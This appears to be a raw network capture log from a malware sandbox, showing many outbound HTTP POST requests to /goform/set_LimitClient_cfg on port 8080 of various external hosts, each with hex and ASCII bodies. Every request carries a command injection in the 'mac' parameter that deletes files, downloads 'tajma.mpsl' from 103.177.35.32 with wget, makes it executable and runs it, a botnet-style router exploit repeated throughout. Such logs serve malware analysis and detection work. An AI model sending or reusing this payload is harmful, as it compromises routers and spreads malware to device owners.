                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1922192.168.2.2347944185.0.144.248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433424950 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1923192.168.2.234600051.47.27.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433439970 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1924192.168.2.2336498105.116.249.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433460951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1925192.168.2.2358500207.173.65.2058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433468103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1926192.168.2.2341754185.229.246.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433621883 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1927192.168.2.2333080182.13.237.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433643103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1928192.168.2.23541622.199.138.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433661938 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1929192.168.2.2353230172.121.234.2558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433706045 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1930192.168.2.2339984160.133.27.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433795929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1931192.168.2.235033032.35.184.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433805943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1932192.168.2.2344140147.143.179.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433832884 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1933192.168.2.2334590165.62.14.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433851004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1934192.168.2.2358790218.130.75.718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433875084 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1935192.168.2.235827814.114.92.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433896065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1936192.168.2.233655435.187.55.488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433928967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1937192.168.2.235219020.161.28.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433976889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1938192.168.2.2349522131.13.141.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.433993101 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1939192.168.2.235090646.38.75.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434010983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1940192.168.2.234321496.227.232.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434036016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1941192.168.2.235519068.39.121.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434056997 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1942192.168.2.2336178124.218.49.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434072018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1943192.168.2.2356816130.184.84.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434098959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1944192.168.2.2343794112.134.211.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.434114933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
